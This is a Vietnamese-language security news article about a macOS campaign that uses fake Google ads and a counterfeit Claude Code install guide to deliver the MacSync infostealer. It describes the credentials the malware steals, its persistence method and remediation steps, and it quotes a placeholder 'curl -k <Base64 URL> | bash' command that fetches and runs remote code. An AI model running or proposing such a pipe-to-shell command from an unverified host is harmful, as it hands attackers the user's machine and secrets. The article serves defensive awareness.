Một chiến dịch tấn công mạng macOS mới đang lợi dụng quảng cáo Google giả mạo để phân phối một hướng dẫn cài đặt Claude Code giả mạo rất thuyết phục. Chiến dịch này nhắm mục tiêu vào người dùng macOS, đặc biệt là các nhà phát triển, nhằm cài đặt mã độc MacSync, một loại infostealer tinh vi.
Kẻ tấn công biến một tìm kiếm phát triển thông thường thành con đường đánh cắp thông tin đăng nhập và xâm phạm tài khoản rộng rãi hơn. Sự tinh vi của cuộc tấn công nằm ở khả năng lạm dụng các kênh đáng tin cậy và thói quen tìm kiếm của người dùng.
Kỹ thuật Khai thác qua Google Ads và Chia sẻ Tài liệu Giả mạo
Cuộc tấn công bắt đầu khi người dùng tìm kiếm trợ giúp cài đặt “Claude Code” và nhấp vào một kết quả quảng cáo được tài trợ. Quảng cáo này được thiết kế để trông giống như một trang web chính thức của Claude, khiến nạn nhân ít nghi ngờ trước khi sao chép lệnh terminal được cung cấp.
Chiến thuật Lừa đảo và Ngụy tạo Độ tin cậy
Quảng cáo được tài trợ sử dụng tiêu đề liên quan đến Claude và hiển thị tên miền hợp pháp claude.ai. Sau khi nhấp vào, nạn nhân được chuyển đến một trang chia sẻ Claude thực sự, nhưng được trình bày như một hướng dẫn cài đặt và được dán nhãn là do “Apple Support” chia sẻ. Điều này tạo ra nhiều dấu hiệu tin cậy sai lệch, lừa dối người dùng tin rằng đây là một nguồn hợp pháp.
Che giấu Lệnh Thực thi Độc hại
Các nhà phân tích từ Deriv AI đã phát hiện ra rằng lệnh cài đặt trong hướng dẫn che giấu vị trí tải xuống thực sự của nó bằng cách mã hóa Base64. Điểm đến ẩn này tải xuống mã độc MacSync. Kỹ thuật này tương tự như các phương pháp được thấy trong các lệnh mã độc Base64 được mã hóa, vốn được dùng để che giấu hoạt động độc hại khỏi một cái nhìn nhanh.
Lệnh của hướng dẫn không hiển thị rõ ràng máy chủ sẽ nhận yêu cầu. Nó sử dụng văn bản Base64 và tính năng thay thế lệnh shell để giải mã đích đến chỉ khi lệnh được thực thi. Sau khi giải mã, lệnh này liên hệ với cơ sở hạ tầng không liên quan đến nhà cung cấp phần mềm.
Đáng chú ý, lệnh sử dụng tùy chọn -k của curl, vốn bỏ qua việc xác thực chứng chỉ SSL/TLS. Việc vô hiệu hóa xác thực chứng chỉ là một dấu hiệu đỏ rõ ràng, thường được các tác nhân đe dọa sử dụng để tránh bị phát hiện và cho phép giao tiếp với các máy chủ không đáng tin cậy.
curl -k <URL_được_mã_hóa_Base64> | bashCác nhà nghiên cứu đã phát hiện ra rằng cùng một cơ sở hạ tầng này được dùng để phân phối payload, hoạt động command-and-control (C2) và đánh cắp dữ liệu nhạy cảm liên quan đến ví tiền điện tử.
Hoạt động của Mã độc MacSync và Mối đe dọa mạng
Mã độc MacSync là một infostealer mạnh mẽ được thiết kế để thu thập nhiều loại thông tin nhạy cảm từ các hệ thống macOS bị nhiễm. Mục tiêu chính của nó là thông tin đăng nhập và dữ liệu phiên người dùng, cho phép kẻ tấn công tiếp cận sâu rộng vào các tài khoản và tài nguyên của nạn nhân.
Các loại Dữ liệu bị Đánh cắp bởi MacSync
MacSync có khả năng thu thập các loại dữ liệu sau:
- Thông tin từ macOS Keychain, bao gồm mật khẩu hệ thống và ứng dụng được lưu trữ.
- Mật khẩu trình duyệt đã lưu và cookie phiên làm việc, có thể cho phép kẻ tấn công chiếm quyền kiểm soát các tài khoản đã đăng nhập mà không cần xác thực đa yếu tố (MFA) thông thường của nạn nhân.
- Khóa SSH (Secure Shell), cung cấp quyền truy cập vào các máy chủ từ xa và kho lưu trữ mã nguồn.
- Thông tin đăng nhập đám mây và cài đặt Kubernetes, mở ra cánh cửa cho việc truy cập vào môi trường đám mây và quản lý container.
- Token nhà phát triển, có thể được sử dụng để truy cập vào các kho lưu trữ mã nguồn, công cụ CI/CD, và các hệ thống triển khai.
- Phiên làm việc của Telegram Desktop.
- Dữ liệu từ hơn 80 ví tiền điện tử khác nhau.
Các nhà nghiên cứu cũng cảnh báo rằng mã độc MacSync có thể sửa đổi Ledger Live để thu thập thông tin ví. Do đó, việc xóa infostealer có thể không đủ, vì ứng dụng ví tiền điện tử vẫn có thể bị xâm phạm và cần được xử lý cẩn thận.
Cơ chế Duy trì Quyền truy cập
Để đảm bảo duy trì quyền truy cập vào hệ thống bị nhiễm, mã độc MacSync thiết lập tính bền bỉ thông qua một LaunchAgent. LaunchAgent này được ngụy trang giống như một trình cập nhật của Google Keystone, một thành phần hợp pháp trên macOS. Điều này giúp mã độc tồn tại qua các lần khởi động lại hệ thống và hoạt động ngầm mà ít bị phát hiện.
Ngoài ra, mã độc còn để lại các tệp tạm (staging files) trên hệ thống, điều này có thể gây khó khăn cho việc làm sạch hoàn toàn và khôi phục hệ thống.
Ảnh hưởng đến Nhà phát triển và An ninh mạng
Đối với các nhà phát triển, hậu quả của việc nhiễm mã độc MacSync có thể vượt xa một máy Mac đơn lẻ. Việc truy cập vào các kho lưu trữ mã nguồn, môi trường đám mây, tài khoản xuất bản gói phần mềm và hệ thống triển khai đều có thể bị lộ. Đây là lý do tại sao các chiến dịch infostealer macOS ngày càng mở rộng sang quy trình làm việc tập trung vào nhà phát triển.
Chiến dịch này đặc biệt đáng lo ngại vì nó không đòi hỏi lỗ hổng trình duyệt, email lừa đảo (phishing) hay trang web nhà cung cấp bị tấn công. Thay vào đó, nó lạm dụng các trang đáng tin cậy, các tín hiệu thương hiệu quen thuộc và thói quen phổ biến là làm theo kết quả tìm kiếm đầu tiên.
Hoạt động này cũng luân phiên nhiều mồi nhử trang chia sẻ Claude trong cùng một chiến dịch Google Ads. Cách tiếp cận này có nghĩa là việc loại bỏ một hướng dẫn hoặc quảng cáo độc hại có thể không ngăn chặn được chiến dịch rộng lớn hơn, tương tự như các cuộc tấn công cài đặt qua Google Ads khác khai thác người dùng tìm kiếm phần mềm đáng tin cậy.
Chỉ số Thỏa hiệp (IoCs)
Để đảm bảo an toàn, các địa chỉ IP và tên miền liên quan đến chiến dịch này thường được làm mờ (defanged) trong các báo cáo công khai (ví dụ: sử dụng [.] thay vì .). Điều này nhằm ngăn chặn việc vô tình giải quyết hoặc tạo liên kết đến các tài nguyên độc hại.
Các chỉ số thỏa hiệp (IoCs) cần được “re-fang” (khôi phục định dạng gốc) và phân tích chỉ trong các nền tảng threat intelligence được kiểm soát như MISP, VirusTotal hoặc hệ thống SIEM của bạn.
Biện pháp Phòng ngừa và Khắc phục mối đe dọa mạng
Các nhóm bảo mật cần coi bất kỳ việc thực thi lệnh độc hại nào là một sự thỏa hiệp hoàn toàn thiết bị và thông tin đăng nhập, thay vì chỉ giả định rằng việc làm sạch bằng phần mềm chống virus là đủ để giải quyết sự cố.
Phòng ngừa
- Người dùng nên tránh các kết quả được tài trợ khi cài đặt các công cụ dành cho nhà phát triển. Thay vào đó, hãy truy cập trực tiếp tài liệu chính thức của nhà cung cấp.
- Trước khi chạy bất kỳ lệnh terminal nào, hãy giải mã văn bản bị ẩn, kiểm tra mọi đích đến và từ chối các lệnh vô hiệu hóa kiểm tra chứng chỉ hoặc kết nối với các tên miền không liên quan.
Khắc phục Sau khi Bị Tấn công
Nếu lệnh độc hại đã được thực thi, máy Mac bị ảnh hưởng phải được cách ly ngay lập tức và không được sử dụng cho các hành động khôi phục. Từ một thiết bị sạch khác, nạn nhân nên thực hiện các bước sau để đảm bảo an toàn thông tin:
- Thay đổi tất cả mật khẩu và khóa liên quan.
- Thu hồi các phiên trình duyệt và nhà phát triển đã đăng nhập.
- Xem xét hoạt động kho mã nguồn và CI/CD để phát hiện bất kỳ sự thay đổi hoặc truy cập trái phép nào.
- Chuyển tất cả tiền điện tử sang một ví mới và an toàn.
- Khôi phục lại hình ảnh (reimage) máy Mac bị nhiễm để đảm bảo loại bỏ hoàn toàn mã độc MacSync và các thành phần liên quan.
Những bước này ngày càng quan trọng khi mã độc macOS sử dụng Google Ads để khai thác lòng tin vào kết quả tìm kiếm và các dịch vụ trực tuyến quen thuộc. Việc báo cáo trang chia sẻ độc hại và chiến dịch quảng cáo liên quan cũng có thể giúp phá vỡ các mồi nhử tương tự.










